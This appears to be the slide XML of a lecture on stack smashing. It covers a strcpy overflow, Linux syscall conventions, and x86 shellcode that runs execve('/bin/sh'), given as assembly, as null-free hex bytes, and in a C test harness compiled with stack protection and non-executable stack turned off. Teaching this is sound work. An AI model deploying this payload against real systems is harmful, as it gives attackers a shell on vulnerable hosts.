          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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37160" rtlCol="0" anchor="t" anchorCtr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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = 0xDEADBEEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(probably crash)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16430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1143000"/>
            <a:ext cx="6629400" cy="541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dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ff &lt;+27&gt;:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048400 &lt;+28&gt;:	ret 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Shellcode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Traditionally,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>we inject assembly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instructions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exec(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”)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into buffer.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ee “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Smashing the stack for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>fun and profit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” for exact string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>or search online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33148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shellcode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rc 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5898896" y="2743200"/>
            <a:ext cx="1187704" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5378754"/>
              <a:gd name="adj2" fmla="val 16251393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system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308209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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is faster, but this is the traditional explanation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2506" y="1682859"/>
            <a:ext cx="5978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Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> number in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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Set up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 2 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 3 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>System call runs. Result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Cambri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8860" y="1295400"/>
            <a:ext cx="6086281" cy="838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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, 0, 0);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324176" y="2438400"/>
            <a:ext cx="1743624" cy="838199"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -110292"/>
              <a:gd name="adj2" fmla="val 1435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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 0xb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162800" y="3581400"/>
            <a:ext cx="1905000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -193178"/>
              <a:gd name="adj2" fmla="val -5687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. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx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0 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx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0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104E-7 2.7698E-6 L 2.81104E-7 0.135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Shellcode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492875"/>
            <a:ext cx="7711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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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1295400"/>
            <a:ext cx="3276600" cy="4343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/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx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mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push 0x6e69622f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0"/>
              <a:t>mov al, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0xb</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p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40870" y="2667000"/>
            <a:ext cx="5181600" cy="13716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da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x73\x68\x68\x2f\x62\x69\x6e\x89”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80”;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712767"/>
            <a:ext cx="144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Shellcode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4191000"/>
            <a:ext cx="2484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Executable String</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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096000" y="1295400"/>
            <a:ext cx="2590800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36607"/>
              <a:gd name="adj2" fmla="val 8650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Notice no NULL chars. Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="756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492875"/>
            <a:ext cx="7711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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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4186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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\x73\x68\x68\x2f\x62\x69\x6e\x89"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> : %d bytes\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*f)()=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*)())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> f();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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3810000" y="5093532"/>
            <a:ext cx="4422789" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc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-o shellcode -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-stack-protector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  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execstack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shellcode.c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492875"/>
            <a:ext cx="7711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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
